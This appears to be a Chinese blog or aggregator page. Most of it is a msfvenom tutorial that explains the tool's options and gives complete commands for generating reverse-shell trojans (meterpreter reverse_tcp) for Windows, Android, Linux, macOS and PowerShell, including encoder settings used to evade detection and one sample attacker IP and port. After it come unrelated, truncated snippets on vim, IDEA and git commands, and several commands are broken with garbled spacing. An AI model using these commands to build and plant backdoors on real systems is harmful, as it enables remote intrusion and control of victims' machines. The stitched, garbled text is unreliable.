原理:msfvenom是msfpayload、msfencode的結合體,利用msfvenom生成木馬程式,並在目標機上執行,在本地監聽上線
使用說明:
-p, --payload 使用指定的payload
-l, --list [module_type] 列出指定模組可用的payloads,包括payloads、encoders、nops、all
-n, --nopsled 為payload指定乙個 nopsled 長度
-f, --format 指定輸出格式,如exe等
-e, --encoder 使用編碼器
-a, --arch 指定payload構架(x86、x64)
--platform 指定payload平台
-s, --space 指定payload攻擊荷載的最大長度
-b, --bad-chars 指定規避字符集,如: '\x00\xff『
-i, --iterations 指定編碼次數
-c, --add-code 指定乙個附加的win32 shellcode 檔案
-x, --template 指定乙個可執行檔案作為模板
-k, --keep payload自動分離並注入到新的程序
-o, --out 儲存生成的payload
-v, --var-name 指定自定義變數
-h, --help 顯示幫助檔案
一、檢視msfvenom支援的payload msfvenom --list payload
二、檢視msfvenom支援的平台 msfvenom --list platforms
三、檢視msfvenom支援的編碼格式 msfvenom --list encoders 其他的也是同理
使用metaspoilt生成木馬
msfvenom -a x64 --platform windows -p windows/meterpreter/reverse_tcp
lhost=192.168.30.133 lport=12345 - e x86/shikata_ga_nai -b '\x00\xff' -i 3 -f exe -o chen.exe
msfvenom -p android/meterpreter/reverse_tcp lhost= =《攻擊機ip> lport==《攻擊機埠》 -o
mm.apk
msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp lhost=《攻擊機ip>
lport=《攻擊機埠》 -
f elf -o payload.elf
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp lhost=《攻擊機ip> lport=《攻擊機
埠》 -f macho - o payload.macho
msfvenom -a x86 --platform windows -p windows/powershell_reverse_tcp lhost=《攻擊機ip>
lport=《攻擊機埠》 -e
cmd/powershell_base64 -i 3 -f raw -o payload.ps1
vim常見使用命令
一般模式 在linux終端中輸入 vim 檔名 就進入了一般模式,但不能輸入文字。命令模式 在一般模式下按 冒號 就會進入命令模式,左下角會有乙個冒號出現,此時可以敲入命令並執行 按esc可回到一般模式。vim filename 開啟或新建檔案,並將游標置於第一行首 vim n filename 開...
IDEA常見使用命令
1.f7 debug的時候,如果當前行是乙個方法,則進入當前方法體內。如果該方法體內還有方法,則不會進入內嵌的方法 2.f8 debug的時候,如果當前行是乙個方法,則不進入當前方法體內 3.f9 debug的時候,恢復程式執行,如果該斷點下邊的 還有斷點,則停到下乙個斷點上 4.alt f8 de...
git常見使用命令
2 檢視當前分支狀態 3 檢視當前有哪些分支 4 在工作區的第一次修改被放入暫存區,準備提交 5 暫存區的修改提交 6 推送到遠端倉庫 7 取回遠端主機某個分支的更新,再與本地的指定分支合併 8 從當前分支切換到 dev 分支 9 建立並切換新分支 拉取遠端分支到本地分支 本地不存在此分支 10 檢...